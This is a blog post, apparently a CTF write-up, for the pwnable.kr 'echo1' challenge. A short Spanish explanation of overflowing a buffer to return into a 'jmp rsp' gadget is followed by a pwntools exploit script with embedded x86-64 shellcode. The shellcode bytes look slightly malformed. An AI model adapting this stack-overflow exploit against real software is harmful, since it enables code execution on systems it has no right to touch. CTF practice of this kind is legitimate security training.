History view
Writeup - pwnable.kr
Sabiendo que tenemos un overflow y la dirección de retorno en el stack, podríamos escribe en el bufferjmp rsp. Segundo aprovecharemos el overflow para escribir en la dirección de retorno justo la dirección del bufferjmp rspy seguidamente el shellcode. PWNED.
Exploit
from pwn import * import time context.log_level = 'debug' p = remote ( "pwnable.kr" , 9010 ) #p = process ('./echo1') # gdb.attach (p, '' ' #break * 0x0000000000400818 #continue #' '') shellcode = "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05 " p. recvuntil ( "hey, what's your name?" ) p.sendline (asm ( "jmp rsp" , arch = 'amd64' , os = 'linux' )) p.recvuntil ( ">" ) p.sendline ( "1" ) sleep ( 1 ) p.sendline ( "AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG\xa0\x20\x60\x00\x00\x00\x00\x00"+shellcode) p.interactive ()
'Pwning in Linux' 카테고리의 다른 글
| Armoury - Pragyan CTF 19 (2) | 2019.03.10 |
|---|---|
| Secret Keeper - Pragyan CTF 19 (0) | 2019.03.09 |
| Exploit - Two targets pwnable.xyz (0) | 2019.03.01 |
| Exploit - Note pwnable.xyz (0) | 2019.03.01 |
| Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- 32Bit
- Call oriented programming
- format string
- pwnable.tw
- Pwnable.kr
- hijacking redirection flow
- buffer overflow
- write primitive
- arithmetic overflow/underflow
- one gadget
- cracking
- html injection
- dnspy
- Windows
- return oriented programming
- stack pivot
- leak stack memory address
- canary
- Backdoors
- theFaunia course
- shellcode
- leak libc
- use after free
- GOT Dereferencing/Overwriting
- ASM
- pwnable.xyz
- x64dbg
- XSS
- fake stack frame
- open-redirect
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
Archives